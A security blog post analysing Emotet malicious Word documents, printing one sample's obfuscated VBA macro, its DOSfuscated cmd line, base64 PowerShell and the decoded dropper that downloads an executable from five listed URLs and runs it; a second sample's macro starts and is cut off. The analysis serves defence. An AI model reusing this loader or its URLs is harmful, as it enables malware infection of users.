The Emotet Trojan: A Tale of Two Malware Samples

This blog post serves to further examine the Emotet Malware, while also telling the tale of another interesting observation that is something to watch out for with this particular Trojan.

I've been examining Emotet's malicious documents a lot lately, since this malware campaign is on everyone’s lips, and I wanted to take a moment to point out an interesting observation I ran into a few days ago.

As a rough sketch, here’s what Emotet does all day: Millions of people receive spam emails designed to look like package shipping notices, or billing invoices, or other plausible documents that people would normally receive, somewhat like a phishing campaign. These emails then either have a Word doc file attached to them, or a URL link in the email that points to a Word doc file. Then, when you open that doc file, you’re presented with a fake template telling you that your copy of Word is configured improperly and implores you to fix that. (Pro Tip: The only thing incorrect about it is the part where it’s not letting the document’s AutoOpen() macro execute and do bad things to you.) Then, some subset of millions of people go ahead and Enable Macros, and set themselves up for a meeting with their IT department.

So, let's have a look at one of these maldocs. How about the sample with the sha1 hash 7de95cb762eb9a6c0911d054fc4adab529185f41 ?   

That's definitely an Emotet maldoc.

Inside this maldoc, we find a nasty pile of Visual Basic macro code:

	Attribute VB_Name = "oGhNIGEoMzPhc"
	Function wbEBOkTwF()
	On Error Resume Next
	iHNMbj = 46446 / wwwpVf
	   iHNMbj = 93358 / YhVEE - jKFCQ - BthZR
	   IsArray nhsYw - ArBsfn
	ifOSuz = "Md /v:^on^ ^  ^ /r" + CStr(Chr(EXVUXjiYRToZM + oJflHUWcJUB + 34 + DALsKFcubF + wEwPJaiCfkbl)) + "s^e^T"
	VarType CDate(143449149)
	XGdutGirnDA = " ^    ^X^H^=^pow^er(0e^ll^ -^e^ ^J^:B^E:H^I^"
	VarType CCur(XilZnu / LMbaj)
	   IsArray YMiWXK / TGspYZ * kUqzwu / zJiAnn
	bzDSmnWj = ":^Sw^:9:G{^:Z^,^B3^:C^#:bwBi^:^G^o^:Z,"
	iHNMbj = Hex(lbDzWk - finSh - PjKjG - FrsVQ)
	   IsArray Sqr(37376 + IVJHal - 68087 - rCEbsk)
	   IsArray Sin(RZmthz)
	   IsArray Month(Narlc)
	wuBGC = "B^4^:H,^:^I:^B.^:^GU^:d"
	iHNMbj = CDate(658)
	   IsArray CDate(369)
	   iHNMbj = Month(88)
	zDwYTqNUNw = "^:^:/^:^Fq:Z^,Bi:^E;:b^:Bp:G^"
	iHNMbj = Atn(75)
	   IsArray Second(UXVoZC)
	iHmVqhAG = "U:^bgB#:D(:^J:^B^L:^H^Y^:,g"
	IsArray Log(83727 - 45846)
	   VarType QHiHhu * FnFlSz / 86839 + FVLSsD
	   VarType Sqr(tclUXh)
	sqzMd = "^:^9^:Cq^:a^:B#^:H^,:q:^:^6:C8^:^L^w"
	IsArray 51613 + 49369
	   IsArray 41833 * Dpopia
	   VarType Sin(69)
	ztzUdYjbYS = "Bk^:Gk:Z^wB^p:^H,^:Y,^B(:C{^:^Z,B#^:^G{^:^Y,Bz^:G8:^Z^"
	VarType Oct(wUsdSK)
	   iHNMbj = Atn(61540 - EruNad - 16717 * fwZVYw)
	   VarType IBmRM / UGchY + RzzZp * dijda
	   VarType HCXDC * WcOdDT + COqrz - 73025
	LiNmOlLjAj = "g^B^#^:C^{^:^Z,B^1:C^8:Uw^B:^:"
	IsArray Round(32424 / GjujO)
	   VarType TimeValue(IiiajV)
	   IsArray 24606 - 10082
	fdtArdNdZjl = "Gg^:d:B#^:H::^.^g^:v^:C8^:^q^wBv^:G^;:^a^,^B"
	VarType CVar(MzWTnA)
	   VarType Month(3984)
	HFbnRIPhMjZ = "v^:^G^#:Y,B2^:^G^U:^bg^:/^:G;^:bwB^t^:C^8:^d^"
	wbEBOkTwF = ifOSuz + XGdutGirnDA + bzDSmnWj + wuBGC + zDwYTqNUNw + iHmVqhAG + sqzMd + ztzUdYjbYS + LiNmOlLjAj + fdtArdNdZjl + 	HFbnRIPhMjZ
	   IsArray Atn(45)
	   iHNMbj = Log(59500 * 52241 - DcKmcC - DqEtWI)
	   IsArray 21833 / nAPKzj
	End Function
	Function zZJzKY()
	On Error Resume Next
	VarType TypeName(FzKzp)
	   VarType 99994 - 78258
	   iHNMbj = Atn(mioVj)
	   VarType CVar(8)
	   VarType CDbl(ZIHMSJ)
	iYbfU = ",^B0:G(:^S^g^:#^:^E:^:^a^:^B^#^:H^,^:q^::6^:"
	VarType CrovPD + 23590
	   iHNMbj = 30613 - iTEAa * QOOVY * WTqhT
	cwFoEaZvHDh = "C^8:L^wBp:H;:bw^B4:^Gk:^Y"
	iHNMbj = Second(dfRjJc)
	   iHNMbj = CDate(YhqwD - SklcrJ + UpoNZ * XpzNQd)
	   iHNMbj = CDate(87552 - zzKjK)
	   IsArray Round(JLzKUG)
	   VarType WYJnJ * IuzBG
	acioUa = "^,^B(:G^k^:^d^:B^l:H^;^:^Lg^B4:G8^:b^,^:/:G^{"
	VarType 54961 + hwzZrm * lwuJf * 58740
	   VarType Atn(aSijw)
	cDAXDMloG = "^:^Z^w:v:^D^;:^a:B;^:H^g^:V^,B^1:G^,^:NwB^:^:"
	iHNMbj = 98275 * wQLstc
	   IsArray TypeName(452)
	   VarType hMNMdp + XTibo * MhTpu * ilHRZq
	   IsArray Log(awpTR)
	bJKUi = "^G^g^:^d:^B#:^H::.g:v^:C8^:b^,B"
	IsArray 70091 * VwavnV - 8266 + szXoH
	   iHNMbj = Second(SfjMp)
	   iHNMbj = 13327 * wVYij - 72184 - 18440
	EzvoYzw = "v^:H^Y^:^Z,^Bp:H^;:Z^wBv^:^G,:b^w^B"
	zZJzKY = iYbfU + cwFoEaZvHDh + acioUa + cDAXDMloG + bJKUi + EzvoYzw
	   IsArray 48950 - KisNQj + aGpKL + aJkfRi
	   iHNMbj = CStr(uHZBi - ZDwYVO)
	   VarType Xtnzk + EovAY
	   iHNMbj = TypeName(CvkoZ)
	End Function
	Function joLbP()
	On Error Resume Next
	IsArray Cos(5)
	   iHNMbj = Str(31405 - CsLLzv * 71381 * wvIRSp)
	   iHNMbj = 40288 + 33998
	   VarType Hex(2)
	   VarType Cos(SjEJm)
	DViVP = "^p^:C{:^Yw^Bv:^G^#:^L^g^Bi^:^HI^:L^w^B^Z^:H^I^:R"
	iHNMbj = CStr(2814)
	DzTTT = "^,:^z:D^I^:Vw^BN^:^E^,^:^,:B"
	iHNMbj = Sgn(358)
	   VarType TypeName(633)
	   IsArray 80382 / Hwbha
	wadHL = "^o^:H^,^:^d:^B^w^:^D^o^:L^w^:v^:^G^{:a,B2:G^E:qwBp:C^{^:"
	iHNMbj = Val(4)
	   VarType CByte(53)
	kHRjnq = "a^,B/:C^8^:Uw:^`:C{:^UwB^w:^Gw:^a^,^B^#:Cg^:^Jw^B:^:Cq^:^K"
	iHNMbj = dObNzo * FCkjHC - FLCrjW / HiBUq
	RiEjupYs = ",^:^7:C,:Z^gB3:H^o:^I^:^:"
	iHNMbj = CDate(7315)
	iiMCLUSszdr = "9:C:^:^Jw:^{^:^D^U:.,:^`^:^D(:J:B^I:E{^:q^::9:C,^:^Z,B/:H"
	VarType Sqr(jFwYYv)
	   iHNMbj = Log(579)
	lHITPMr = "Y:^.^gB^w^:H^U:Y^gB(:Gk"
	IsArray RmcapZ * VEszi * 6615 / WfatJ
	   IsArray Sqr(2)
	   iHNMbj = Str(623)
	   VarType Round(33403 / ftsYzc)
	GwaCl = ":^Yw:r^:Cq:^X^:^:^`:C(:^J:^Bm:H^q^:^eg:r:Cq:LgB"
	joLbP = DViVP + DzTTT + wadHL + kHRjnq + RiEjupYs + iiMCLUSszdr + lHITPMr + GwaCl
	   IsArray iIUGb / 59804 + 31980 * oBftF
	   IsArray TimeValue(ihRcd)
	   VarType Val(lOcUA)
	   iHNMbj = 93605 * swCzuW
	End Function
	Function PZiIj()
	On Error Resume Next
	VarType Val(98225 - sddzA * nsAAo - 78027)
	SXPjvZbo = "^l:H^g:^Z^,^:`:^D(^:ZgBv^:HI^:^Z,^B0^:G;:^a^:"
	IsArray CCur(535)
	   VarType qMXtN - YAktid
	PYWHFroKw = "^:o:C,:V^gB^3^:G^g:I^:Bp^:G{^:"
	IsArray huZcc + chdPIJ - 80212 / FAEEc
	   iHNMbj = Round(48)
	   VarType LCase(zoGQt)
	GvORZGk = "I^::^k^:E(^:d^gBC:Ck^:^ewB#^:^H"
	iHNMbj = oLwCHM * 1850 * 26068 + njRto
	   iHNMbj = CDate(962)
	   VarType hDbVp * dvSWF
	wzocGwdfHPt = "I^:e,^B^7^:C^,^:R^:^B^$:E(^:L^g^BE:^G8^:^d^w"
	IsArray ZUuAtL / zFmcJ
	   IsArray Rnd(GAMlr - BcnRA)
	   iHNMbj = mkLHLs * aFuUw / QrEwbb + BPEdNw
	DWDsNkSIYG = "B/:^Gw^:bwB0^"
	PZiIj = SXPjvZbo + PYWHFroKw + GvORZGk + wzocGwdfHPt + DWDsNkSIYG
	   iHNMbj = Log(9)
	End Function
	Function lhHCia()
	On Error Resume Next
	iHNMbj = CBool(oWfitP)
	   VarType Sin(24)
	   IsArray CStr(MHJXrq)
	ZTdlqhQI = ":G^,:R^gBp^:^Gw^:Z^,:o^:C^,:V^gB"
	VarType 85274 + 84181
	   IsArray 70477 + lBcEcJ - dUXsM / pqQFX
	   iHNMbj = Val(830 * ATCTQs)
	   IsArray 18895 * RjKOzm
	GWOCD = "3^:Gg^:^L::g^:C,^:^S:B^.^:H^::K^,:^7:^E^"
	iHNMbj = CStr(59257 + rIIft)
	   iHNMbj = Sqr(szQDt - KKlhi / 73397 - HVMiWn)
	   VarType Log(rUobX)
	   VarType qGDiIj / ViZcwI
	   iHNMbj = 84390 * zmYbRm * rTzuO * snUcvN
	boYhTUQV = "k^:^bgB2:^G8^:a^w^B^l:C#:^S^,^B#^:GU^:b^,^:g:C^,^:S^:"
	IsArray Second(2384)
	   IsArray CDec(4009)
	   IsArray Str(67831 / AzppD)
	   IsArray 70021 - tEiibp - itzibf / KbthKC
	   VarType 78399 + tFWvaJ / 12006 / nIzWzK
	TjSPiDZHXC = "B.^:H:^:.wB^i^:^HI:Z,^B0:^G(:^.wB9:^"
	IsArray 90172 * YHiFFH + ZFtLZm + uTiIK
	   iHNMbj = CDec(zoBuz)
	jGiKtziiDru = "G;:Y^,^B^#^:G;:"
	IsArray LCase(FAzAZ)
	   iHNMbj = Sin(ChIMH - OdhaT)
	   VarType CVar(881)
	   IsArray Int(61670 + BOMRj + 49941 / RrVJdc)
	KQZLmjqDSo = "a:B^7^:^H#:^f^,:g:C:^:I::^g:C^:^:^I::g^:C^:"
	iHNMbj = TypeName(Rhvhf + GTqJb)
	   iHNMbj = Rnd(MYpnkf * NtjLrV / 17388 * wfPcs)
	   IsArray 21136 * pNtqr - wCTMM * 39779
	   iHNMbj = Int(519)
	dlwaYoiwNpF = ":^I^:^:g:C::I^:^:^g^:C"
	IsArray IsCzk - ZpBQC
	   IsArray qVauz / AKjba
	   iHNMbj = TypeName(30124 / jFTjm)
	FQsXbiSPqzr = ":^:I::g^:C^::&    s^e^T ^ ^H^q=!^XH^:^q=c!&&S"
	VarType CVar(77)
	   IsArray 75143 / pujsui
	   IsArray Kohuu + GAUGm
	   iHNMbj = Oct(21)
	fnqCJ = "^E^T    ^43^G=^!^H^q^:^0^=h!&&"
	lhHCia = ZTdlqhQI + GWOCD + boYhTUQV + TjSPiDZHXC + jGiKtziiDru + KQZLmjqDSo + dlwaYoiwNpF + FQsXbiSPqzr + fnqCJ
	   IsArray CCur(2)
	   iHNMbj = aViLYX / 24379 + WRmmr + AHYwNu
	End Function
	Function BzEQV()
	On Error Resume Next
	iHNMbj = CDbl(517)
	bTiIpknZQjF = " s^Et ^ ^  ^ k^ePY=^!^4^3^G^"
	iHNMbj = Str(WcIYh - mhAsl)
	   VarType Fix(9079)
	AiIYaTZwDTc = ":`^=n^!&&   s^e^T ^L^G0=!^k^e^P^Y^:$=^"
	iHNMbj = Fix(7)
	   iHNMbj = Str(iQTDIo)
	cCcIfS = "y!&&    se^t  ^  ^ ^7M1^S=^!^L^G0^:^4^=^j!&  "
	iHNMbj = FbhSin - SpBuE
	   iHNMbj = 79213 / zEqjOk - 29954 * zQjWk
	HaTrOa = "  S^E^t ^  c^KmC=^!^7M^1^S:(^=s!"
	VarType Rnd(MOzbpE * WEVES)
	   iHNMbj = CStr(azbTD)
	mDDhMav = "&s^E^T ^  ^  v^B^6^a=!c^K^mC^"
	VarType 82032 * lkKOJ
	   VarType fqpNiC * RfJcTi / nNJupU - 59728
	   iHNMbj = 62792 * jfpjuQ + JkfjH + cVLYnp
	QPfwcbzO = ":^,=^Q^!&&s^Et ^ ^ ^  A^j^p=!v^"
	IsArray Hex(BlJshD + 24796 + 28734 - OESjD)
	vfWaB = "B^6^a:.=^O^!&&    s"
	IsArray Log(52058 * ZdwrDl)
	LYjPHGEI = "^eT ^ ^  Vn=^!^A^j^p^:^:^=^A!&se^t ^ ^   ^Y^a=!Vn:^#^=^0"
	VarType ncjkfK - XmOJHq
	   iHNMbj = ztuSzJ / aqYdh
	   VarType Second(4)
	   iHNMbj = 10726 * jGwvH
	   VarType Fix(IWcaJ)
	MMvmN = "!&& SE^T NCt=^!^Y^a:^{^=^4^!&&   SE^T  ^gn0^9=^!NC^t:/^=^u!&  s^"
	iHNMbj = Second(3212)
	   IsArray CCur(Ginadv + pMbvsi + LbSPZ / jIrTZ)
	   VarType BAGUvF - 79299 * FrjEcF - wfuzd
	qQQMSGVrX = "et ^   ^ ^EH=^!^gn^0^9^:;^=^M^!&C^A^L^"
	VarType uIbGz * 75244
	   iHNMbj = Oct(KMfoF)
	dorLEk = "l %^EH%   " + CStr(Chr(UhvLzWYJU + wOHTjMDD + 34 + QZMAuTIt + ZWwkvwQFFL)) + "    "
	BzEQV = bTiIpknZQjF + AiIYaTZwDTc + cCcIfS + HaTrOa + mDDhMav + QPfwcbzO + vfWaB + LYjPHGEI + MMvmN + qQQMSGVrX + dorLEk
	   VarType Hex(79)
	   iHNMbj = CStr(pjGjiK)
	End Function
	
	Attribute VB_Name = "VndRBbniaq"
	
	Sub AutoOpen()
	On Error Resume Next
	CreateObject("WScript.Shell").Run! "C" + ztXZmEVS + hzGljvbXiwb + wbEBOkTwF + zZJzKY + joLbP + PZiIj + lhHCia + BzEQV + vSQMiWUrR + 	zTLkXKmtJwXBoa, 843069887 - 843069887
	End Sub

Ugh. That's awful. Let's clean that up a little bit so we can read it, okay? You see there, where it does "CreateObject()" ? That's going to build a command-line out of all those randomly named pieces of string. Those pieces of string are made of smaller pieces of string in the pile of garbage up above.  

We're screwed.

We're going to have to interpret this pile of Visual Basic.

Et voilà... That gives us a command line that's going to be passed to WScript.Shell (which is VBA's system() call) that looks like:

'CMd /v:^on^ ^  ^ /r" + CStr(Chr(EXVUXjiYRToZM + oJflHUWcJUB + 34 + DALsKFcubF + wEwPJaiCfkbl)) + 
"s^e^T ^    ^X^H^=^pow^er(0e^ll^ -^e^ 
^J^:B^E:H^I^:^Sw^:9:G{^:Z^,^B3^:C^#:bwBi^:^G^o^:Z,B^4^:H,^:^I:^B.^:^GU^:d^:^:/^:^Fq:Z^,Bi:^E;:b^:
Bp:G^U:^bgB#:D(:^J:^B^L:^H^Y^:,g^:^9^:Cq^:a^:B#^:H^,:q:^:^6:C8^:^L^wBk^:Gk:Z^wB^p:^H,^:Y,^B(:C{^:
^Z,B#^:^G{^:^Y,Bz^:G8:^Z^g^B^#^:C^{^:^Z,B^1:C^8:Uw^B:^:Gg^:d:B#^:H::^.^g^:v^:C8^:^q^wBv^:G^;:^a^,
^Bv^:^G^#:Y,B2^:^G^U:^bg^:/^:G;^:bwB^t^:C^8:^d^,^B0:G(:^S^g^:#^:^E:^:^a^:^B^#^:H^,^:q^::6^:C^8:L^
wBp:H;:bw^B4:^Gk:^Y^,^B(:G^k^:^d^:B^l:H^;^:^Lg^B4:G8^:b^,^:/:G^{^:^Z^w:v:^D^;:^a:B;^:H^g^:V^,B^1:
G^,^:NwB^:^:^G^g^:^d:^B#:^H::.g:v^:C8^:b^,Bv^:H^Y^:^Z,^Bp:H^;:Z^wBv^:^G,:b^w^B^p^:C{:^Yw^Bv:^G^#:
^L^g^Bi^:^HI^:L^w^B^Z^:H^I^:R^,:^z:D^I^:Vw^BN^:^E^,^:^,:B^o^:H^,^:^d:^B^w^:^D^o^:L^w^:v^:^G^{:a,B
2:G^E:qwBp:C^{^:a^,B/:C^8^:Uw:^`:C{:^UwB^w:^Gw:^a^,^B^#:Cg^:^Jw^B:^:Cq^:^K,^:^7:C,:Z^gB3:H^o:^I^:
^:9:C:^:^Jw:^{^:^D^U:.,:^`^:^D(:J:B^I:E{^:q^::9:C,^:^Z,B/:HY:^.^gB^w^:H^U:Y^gB(:Gk:^Yw:r^:Cq:^X^:
^:^`:C(:^J:^Bm:H^q^:^eg:r:Cq:LgB^l:H^g:^Z^,^:`:^D(^:ZgBv^:HI^:^Z,^B0^:G;:^a^:^:o:C,:V^gB^3^:G^g:I
^:Bp^:G{^:I^::^k^:E(^:d^gBC:Ck^:^ewB#^:^HI^:e,^B^7^:C^,^:R^:^B^$:E(^:L^g^BE:^G8^:^d^wB/:^Gw^:bwB0
^:G^,:R^gBp^:^Gw^:Z^,:o^:C^,:V^gB3^:Gg^:^L::g^:C,^:^S:B^.^:H^::K^,:^7:^E^k^:^bgB2:^G8^:a^w^B^l:C#
:^S^,^B#^:GU^:b^,^:g:C^,^:S^:B.^:H:^:.wB^i^:^HI:Z,^B0:^G(:^.wB9:^G;:Y^,^B^#^:G;:a:B^7^:^H#:^f^,:g
:C:^:I::^g:C^:^:^I::g^:C^::^I^:^:g:C::I^:^:^g^:C:^:I::g^:C^::&    s^e^T ^ ^H^q=!^XH^:^q=c!&&S^E^T
    ^43^G=^!^H^q^:^0^=h!&& s^Et ^ ^  ^ k^ePY=^!^4^3^G^:`^=n^!&&   s^e^T ^L^G0=!^k^e^P^Y^:$=^y!&& 
    se^t  ^  ^ ^7M1^S=^!^L^G0^:^4^=^j!&    S^E^t ^  c^KmC=^!^7M^1^S:(^=s!&s^E^T ^  ^  
    Vn=^!^A^j^p^:^:^=^A!&se^t ^ ^   ^Y^a=!Vn:^#^=^0!&& SE^T NCt=^!^Y^a:^{^=^4^!&&   SE^T  
^gn0^9=^!NC^t:/^=^u!&  s^et ^   ^ ^EH=^!^gn^0^9^:;^=^M^!&C^A^L^l %^EH%   " + CStr(Chr(UhvLzWYJU + 
wOHTjMDD + 34 + QZMAuTIt + ZWwkvwQFFL)) + "    '

Oh holy hell in a handbasket... It's DOSfuscated. Let's unpack that a bit. It's going to require simulating what cmd.exe does with it, and ultimately cmd.exe is going to run:

powershell -e JABEAHIASwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABLAHYAQgA9ACcAa
AB0AHQAcAA6AC8ALwBkAGkAZwBpAHQAYQBsAC4AZQB0AG4AYQBzAG8AZgB0AC4AZQB1AC8AUwBAAGgAdAB0AHAAOgAvAC8Acw
BvAGMAaQBvAG0AYQB2AGUAbgAuAGMAbwBtAC8AdQBhAGsASgA0AEAAaAB0AHQAcAA6AC8ALwBpAHMAbwBjAGkAYQBsAGkAdAB
lAHMALgBjAG8AbQAuAG4AZwAvADMAaABMAHgAVQB1AGQANwBAAGgAdAB0AHAAOgAvAC8AbQBvAHYAZQBpAHMAZwBvAGQAbwBp
AC4AYwBvAG0ALgBiAHIALwBZAHIARQAzADIAVwBNAEQAQABoAHQAdABwADoALwAvAG4AaQB2AGEAcwBpAC4AaQBuAC8AUwAnA
C4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAZgB3AHoAIAA9ACAAJwA4ADUAOQAnADsAJABIAE4AcAA9ACQAZQBuAHYAOgBwAH
UAYgBsAGkAYwArACcAXAAnACsAJABmAHcAegArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAVgB3AGgAIABpAG4
AIAAkAEsAdgBCACkAewB0AHIAeQB7ACQARAByAEsALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVgB3AGgALAAgACQA
SABOAHAAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQASABOAHAAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0Af
QAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA

Argh, gdd*&*@(#mmo)mmit... Not only is cmd.exe launching powershell, but some "helpful" person decided it was a great idea to let powershell just run random blobs of base64 encoded payload. Let's see what's inside that mess:

"$\x00D\x00r\x00K\x00=\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 
\x00N\x00e\x00t\x00.\x00W\x00e\x00b\x00C\x00l\x00i\x00e\x00n\x00t\x00;\x00$\x00K\x00v\x00B\x00=\x
00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00d\x00i\x00g\x00i\x00t\x00a\x00l\x00.\x00e\x00t\x00n\x00
a\x00s\x00o\x00f\x00t\x00.\x00e\x00u\x00/\x00S\x00@\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00s\x00o\
x00c\x00i\x00o\x00m\x00a\x00v\x00e\x00n\x00.\x00c\x00o\x00m\x00/\x00u\x00a\x00k\x00J\x004\x00@\x0
0h\x00t\x00t\x00p\x00:\x00/\x00/\x00i\x00s\x00o\x00c\x00i\x00a\x00l\x00i\x00t\x00e\x00s\x00.\x00c
\x00o\x00m\x00.\x00n\x00g\x00/\x003\x00h\x00L\x00x\x00U\x00u\x00d\x007\x00@\x00h\x00t\x00t\x00p\x
00:\x00/\x00/\x00m\x00o\x00v\x00e\x00i\x00s\x00g\x00o\x00d\x00o\x00i\x00.\x00c\x00o\x00m\x00.\x00
b\x00r\x00/\x00Y\x00r\x00E\x003\x002\x00W\x00M\x00D\x00@\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00n\
x00i\x00v\x00a\x00s\x00i\x00.\x00i\x00n\x00/\x00S\x00'\x00.\x00S\x00p\x00l\x00i\x00t\x00(\x00'\x0
0@\x00'\x00)\x00;\x00$\x00f\x00w\x00z\x00 \x00=\x00 \x00'\x008\x005\x009\x00'\x00;\x00$\x00H\x00N\x00p\x00=\x00$\x00e\x00n\x00v\x00:\x00p\x00u\x00b\x
00l\x00i\x00c\x00+\x00'\x00\\\x00'\x00+\x00$\x00f\x00w\x00z\x00+\x00'\x00.\x00e\x00x\x00e\x00'\x0
0;\x00f\x00o\x00r\x00e\x00a\x00c\x00h\x00(\x00$\x00V\x00w\x00h\x00 \x00i\x00n\x00 \x00$\x00K\x00v\x00B\x00)\x00{\x00t\x00r\x00y\x00{\x00$\x00D\x00r\x00K\x00.\x00D\x00o\x00w\x00n\x
00l\x00o\x00a\x00d\x00F\x00i\x00l\x00e\x00(\x00$\x00V\x00w\x00h\x00,\x00 \x00$\x00H\x00N\x00p\x00)\x00;\x00I\x00n\x00v\x00o\x00k\x00e\x00-\x00I\x00t\x00e\x00m\x00 \x00$\x00H\x00N\x00p\x00;\x00b\x00r\x00e\x00a\x00k\x00;\x00}\x00c\x00a\x00t\x00c\x00h\x00{\x00}\x
00}\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00"

Nice. It's unicode. It’s always something. Let's make that readable for humans.

"$DrK=new-object Net.WebClient;$KvB='http://digital.etnasoft.eu/S@http://sociomaven.com/uakJ4@http://isocialites.c
om.ng/3hLxUud7@http://moveisgodoi.com.br/YrE32WMD@http://nivasi.in/S'.Split('@');$fwz = '859';$HNp=$env:public+'\\'+$fwz+'.exe';foreach($Vwh in $KvB){try{$DrK.DownloadFile($Vwh, $HNp);Invoke-Item $HNp;break;}catch{}}  

FINALLY. OH MY GOD.

So, that's a neat little pile of powershell scripting... Let's tidy that up and see what it does?

$DrK=new-object Net.WebClient;
$KvB='http://digital.etnasoft.eu/S@http://sociomaven.com/uakJ4@http://isocialites.com.ng/3hLxUud7@http://moveisgodoi.com.br/YrE32WMD@http://nivasi.in/S'.Split('@');
$fwz = '859';
$HNp=$env:public+'\\'+$fwz+'.exe';
foreach ($Vwh in $KvB) {
  try {
    $DrK.DownloadFile($Vwh, $HNp);
    Invoke-Item $HNp;
    break;
  }
  catch{}
 }

Cool, right? It creates a stub of a "web browser" in $DrK. It makes a list of urls to check in $KvB out of 5 different URLs separated by an @ symbol. Then, it goes to each of them in order and tries to download whatever is there as "859.exe" and run it with Invoke-Item.    

Fancy pants.

Needless to say, you shouldn't go clicking on those urls. They're bad for your health.

Now, let's take a look at an entirely different malware document.   

This one is 70a42e30077d2c2c80b9efc24f0c4b09d8cc51d2.

It's got a pile of VBA inside too!

	Attribute VB_Name = "hiaXrvZhVhqMVJ"
	Function XMQOOPAL()
	On Error Resume Next
	HbmZk = 88455 + hdWtV
	   HbmZk = Second(qajWG)
	   VarType CStr(446458898)
	   IsArray Sqr(91856 / zijUst * iwPkz / NiuENI)
	   IsArray 32018 * 64458 / 62173 * NRSjhr
	   VarType CStr(14)
	bajicOMD = "Md /v:^  ^ ^   /r " + CStr(Chr(AajGjwkof + zltQTRmfzifdz + 34 + ouKQwCXMlHlO + zXhZjAjkvG)) + "  S^ET  ^ "
	VarType muAZXo + ruFCu
	   IsArray CStr(pSsdww)
	   VarType Str(447804539)
	   VarType Cos(252)
	   IsArray Month(cibuv)
	tPjiC = " ^ UZnV=p^ow^`rsh`ll^ ;^` "
	HbmZk = LCase(ltajti * 80761)
	   IsArray CDate(zzwtM)
	   VarType Rnd(66923 / Wbdwn + 76957 - tOwJP)
	YOpTU = "^JAB^OAH^I^AT^AA^9A^G^4^A/^Q^B'AC^0^Ab^w^B^.A^G^"
	IsArray CDate(iGJjDM)
	   VarType CDate(255830362)
	   VarType Str(44)
	SKHLKDIj = "o^A/QB(^AH^Q^AIABO^A^G^UAdA^Au^A^FcA/^QB^.^A^E"
	VarType Rnd(4)
	   IsArray CYmVI * 42592
	   HbmZk = 93195 * VZfrn
	   HbmZk = hwHMFs / XnGkKz * wABorc * 45743
	TbbSMfH = "^M^A^bABpAG^UA^bgB^0^AD^s^A^J^A^B^BA^HAAc^QA9^"
	XMQOOPAL = bajicOMD + tPjiC + YOpTU + SKHLKDIj + TbbSMfH
	   IsArray Val(15)
	   IsArray CStr(23)
	   IsArray Log(uaJTnY)
	   VarType 98837 - GCBqT
	End Function
	Function wfhzSmJL()
	On Error Resume Next
	HbmZk = Month(85559 * CNEbcm)
	   IsArray 58939 / YQuiN + 21147 * 34620
	   HbmZk = LCase(272)
	   IsArray ziDjw - 40010
	   IsArray Int(1449 - XAWYRW)
	   IsArray Int(636)
	immusD = "ACc^A^aAB0AHQAcAA^6^AC8^ALw^B(AG8A^bgB^kA^GkA^"
	HbmZk = Rnd(jhTFCQ)
	   IsArray CDate(36829 * GICsc / cUSDW / 62313)
	   IsArray 79301 * UnfBr * 94741 - CzdGGm
	   HbmZk = TXfid + RVJZf + 29913 / Iksus
	GAkhbwazvd = "`^gB^l^AH^IA^L^g^B(^A^G8A^b^Q^A7AHQ^Ac^"
	HbmZk = 91345 / YwiHL * 21554 - oaMZzK
	   IsArray 51918 * 15079
	qwkMpZBr = "wB0AC8^Aa^QBuA^GQA/QB^4AC^4Ac^A^B"
	IsArray kzdMN - TkZJif
	   IsArray Round(KzivV)
	JjjpjaIwMj = "o^A^H^AA_^w^Bs^A^D^0AcwB7^AG^g^AbwA5^AC4Ad^A^BrA^G4"
	VarType CBool(6872)
	   VarType Tan(wTqZw)
	ProiORISwJw = "^A^JwAuA^FMAc^AB^sA^G^kAdA^A^o^ACcAQA^"
	HbmZk = Log(jujKJu)
	   HbmZk = raJfv + jrzisL
	   HbmZk = Tan(2)
	   HbmZk = zwdis - PViHW
	   HbmZk = MvBFwa + KfdqC
	NHtwKCtXr = "An^AC^kAOwA^kAH^MA[QB^uACA^A_Q^AgACcAMQ^A1^ADAAJwA^#"
	HbmZk = CCur(wSZaqq)
	   IsArray CDate(84312 + IwuTw)
	   IsArray Fix(fPrwD)
	   IsArray CByte(8005)
	VUpAswR = "AC^Q^A^SA^B^K^A^G^k^A^_^Q^A^kA^GUA"
	wfhzSmJL = immusD + GAkhbwazvd + qwkMpZBr + JjjpjaIwMj + ProiORISwJw + NHtwKCtXr + VUpAswR
	   HbmZk = 71892 * tRVnbF + iXPhv / 12786
	   IsArray 56790 + 67117 - pHczo * ahEspl
	End Function
	Function zwlScioYLa()
	On Error Resume Next
	VarType pDzSrr - lkUwbU - rAqNc - 78148
	   IsArray nEcuG + MYzWb - 1988 - DwLrd
	uqTihcErAWw = "^b^g^B^2^A^D^o^Ac^AB^1^AGIAbAB^p^AGMAKwAnAFw^AJ^w^Ar"
	VarType 84047 - qMGUNs
	   IsArray AvjQt / zlQZMX / 52924 + 1687
	   VarType Atn(124030663)
	cwRzZWiPWa = "^AC^Q^Acw^B^hA^G4AKwAnAC^4^A/^Q^B^4A^G^UA^J^wA#AG^[A^b^wB^"
	VarType 77841 * 6818 / VwnORI + 26292
	   VarType Sqr(lJTYZz * FanDWu / kzfHOL + 75938)
	UMQhmt = "5^A^G^UA^[^Q^B(AG^gA^K^A^Ak^AE^MA"
	HbmZk = 78891 - 38964 * 2778 - NjOHf
	   VarType 13039 * RmBwF / 99869 - 43558
	   HbmZk = AHFnw + aNfBAI
	   VarType LCase(59353 - YaNYL)
	jJRoiFwOWih = "bQ^BF^AC^AA^a^Q^B^uAC^A^A^JABB^A^"
	IsArray Int(krdrrJ)
	   HbmZk = Tan(jXoLa / KOcFh)
	   IsArray Cos(8948)
	JmZzLf = "H^AAc^QA^p^AHsA^dAB5AH^kA`wA^kAE^4Ac^gB^M^AC"
	IsArray Oct(WaiZBM)
	   HbmZk = LCase(86463 - IDJjap)
